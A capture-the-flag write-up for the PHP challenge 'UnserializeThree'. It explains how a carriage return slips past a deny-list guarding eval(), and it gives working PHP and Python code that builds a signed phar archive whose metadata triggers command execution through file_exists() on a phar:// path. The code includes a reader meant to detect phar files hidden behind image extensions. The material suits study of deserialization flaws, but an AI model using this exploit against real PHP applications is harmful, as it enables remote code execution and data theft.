# [WEEK4] UnserializeThree

class.php

```
<?php
highlight_file(__FILE__);
class Evil{
    public $cmd;
    public function __destruct()
    {
        if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
            //Same point ,can you bypass me again?
            eval("#".$this->cmd);
        }else{
            echo "No!";
        }
    }
}

file_exists($_GET['file']);
```

This is the textbook phar deserialization trigger: `file_exists()` is one of the filesystem functions that open a `phar://` path, and opening the archive unserializes the metadata stored in its manifest (PHP 8.0 stopped doing this automatically, so the trick needs PHP 7), which runs `Evil::__destruct()` on the `Evil` object planted there. The only obstacle is inside the destructor. `eval("#".$this->cmd)` turns the payload into a `#` line comment, and the deny-list rejects `>` and `<` (so `?>` cannot close the comment), `?`, `php` (case-insensitive) and the line feed added as `urldecode("%0a")`. The carriage return `%0d` is not on the list, and PHP's lexer ends a `#` comment at `\r` exactly as it does at `\n`, so a payload that starts with `\r` leaves the comment and gets executed. The earlier exploit can be reused with that one-byte change; once the generated archive is on the target's filesystem it is triggered through `file=phar://…`.

```
<?php
// phar.readonly must be Off in php.ini (or run this with `php -d phar.readonly=0`),
// otherwise the Phar class refuses to create the archive.

class Evil {
    public $cmd;
}

$a = new Evil();
// "\r" (%0d) terminates the "#" line comment prepended by eval(); "\n" (%0a) is filtered.
$a->cmd=urldecode("%0d")."system('cat f*');";
$phar = new Phar("aa.phar"); // the Phar constructor requires a .phar suffix; the file can be renamed afterwards, phar:// identifies an archive by content, not by extension
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // stub; the manifest starts right after __HALT_COMPILER();
$phar->setMetadata($a); // metadata is stored in the manifest in serialize() format and is unserialized when the archive is opened through phar://
$phar->addFromString("test.txt", "test"); // a phar must contain at least one file; its content does not matter
$phar->stopBuffering(); // writes the archive; the signature is computed automatically
?>
```
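As an added example (not the writeup's code), the same archive built by hand in Python, so it needs neither a PHP install nor `phar.readonly=Off`. It follows the phar manifest layout from the PHP manual: stub, 4-byte manifest length, file count, API version, global flags, alias, serialized metadata, one entry per file, the file contents, then a SHA1 trailer ending in `GBMB` (required because `phar.require_hash` is On by default). It also carries a Python copy of the challenge's deny-list to confirm which line terminators get through, and a reader that pulls the metadata back out of any phar-shaped file regardless of its extension, which is the check to run on an upload that claims to be an image. The `Evil` gadget and `test.txt` content mirror the writeup; the output filename and the helper names are assumptions.

```python
"""Build the UnserializeThree phar by hand (added example, not the writeup's code).

Layout follows the phar manifest format from the PHP manual; all integers are
little-endian. Assumption: the target's Evil class has the single public
property "cmd" shown in class.php.
"""
import hashlib
import re
import struct
import zlib

HALT = b"__HALT_COMPILER();"
STUB = b"<?php " + HALT + b" ?>\r\n"   # same stub shape Phar::setStub() writes
PHAR_HDR_SIGNATURE = 0x00010000        # global flag: a signature trailer follows the contents
PHAR_SIG_SHA1 = 0x0002                 # signature type stored in the trailer
PHAR_ENT_PERM_DEF_FILE = 0x01B6        # default file entry permissions (0666)

# "\r" (%0d) ends the "#" line comment that eval() prepends; "\n" (%0a) is filtered.
CMD = "\rsystem('cat f*');"


def passes_filter(cmd: str) -> bool:
    """Python rendering of the challenge's preg_match("/>|<|\\?|php|\\n/i") deny-list."""
    return re.search(r">|<|\?|php|\n", cmd, re.IGNORECASE) is None


def php_serialize_evil(cmd: str) -> bytes:
    """serialize() output for an Evil object with one public property, cmd."""
    body = cmd.encode()
    return b'O:4:"Evil":1:{s:3:"cmd";s:%d:"%s";}' % (len(body), body)


def build_phar(metadata: bytes, files: dict) -> bytes:
    """Return a complete, SHA1-signed phar whose manifest carries `metadata`."""
    entries = b""
    contents = b""
    for name, data in files.items():
        name_b = name.encode()
        entries += struct.pack("<I", len(name_b)) + name_b
        entries += struct.pack(
            "<IIIII",
            len(data),                      # uncompressed size
            0,                              # mtime
            len(data),                      # stored size (no compression)
            zlib.crc32(data) & 0xFFFFFFFF,  # CRC32 of the uncompressed data
            PHAR_ENT_PERM_DEF_FILE,         # entry flags: permissions, no compression bits
        )
        entries += struct.pack("<I", 0)     # no per-file metadata
        contents += data

    alias = b""
    manifest_body = (
        struct.pack("<I", len(files))
        + b"\x11\x00"                                   # manifest API version 1.1.0
        + struct.pack("<I", PHAR_HDR_SIGNATURE)
        + struct.pack("<I", len(alias)) + alias
        + struct.pack("<I", len(metadata)) + metadata  # serialized metadata: the gadget
        + entries
    )
    manifest = struct.pack("<I", len(manifest_body)) + manifest_body
    unsigned = STUB + manifest + contents
    # Trailer: hash of everything before it, 4-byte signature type, magic "GBMB".
    return unsigned + hashlib.sha1(unsigned).digest() + struct.pack("<I", PHAR_SIG_SHA1) + b"GBMB"


def verify_signature(blob: bytes) -> bool:
    """Check the SHA1 trailer the way PHP does when it opens the archive."""
    if not blob.endswith(b"GBMB") or struct.unpack("<I", blob[-8:-4])[0] != PHAR_SIG_SHA1:
        return False
    return hashlib.sha1(blob[:-28]).digest() == blob[-28:-8]


def read_phar_metadata(blob: bytes) -> bytes:
    """Return the serialized metadata of a phar, whatever the file is named.

    phar:// locates the manifest by content, so this also flags a renamed phar
    hiding behind an image extension.
    """
    if HALT not in blob:
        raise ValueError("no __HALT_COMPILER(); token: not a phar")
    pos = blob.index(HALT) + len(HALT)
    if blob[pos:pos + 3] in (b" ?>", b"\n?>"):         # optional closing tag and newline
        pos += 3
        if blob[pos:pos + 2] == b"\r\n":
            pos += 2
        elif blob[pos:pos + 1] == b"\n":
            pos += 1
    manifest_len, = struct.unpack_from("<I", blob, pos)
    manifest_end = pos + 4 + manifest_len
    pos += 4 + 4 + 2 + 4                                # length, file count, version, flags
    alias_len, = struct.unpack_from("<I", blob, pos)
    pos += 4 + alias_len
    meta_len, = struct.unpack_from("<I", blob, pos)
    pos += 4
    if pos + meta_len > manifest_end:
        raise ValueError("metadata length exceeds manifest")
    return blob[pos:pos + meta_len]


def build_exploit_phar() -> bytes:
    """The archive from the writeup: Evil gadget in the metadata, one dummy file."""
    return build_phar(php_serialize_evil(CMD), {"test.txt": b"test"})


if __name__ == "__main__":
    blob = build_exploit_phar()
    with open("aa.phar", "wb") as fh:   # output name is an assumption
        fh.write(blob)
    print("filter passes:", passes_filter(CMD), "| metadata:", read_phar_metadata(blob))
```

The signature is mandatory rather than optional: with the default `phar.require_hash=On`, PHP refuses an archive whose global flags lack the signature bit or whose trailer hash does not match, so a hand-built phar that skips the trailer never reaches the metadata unserialization step.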
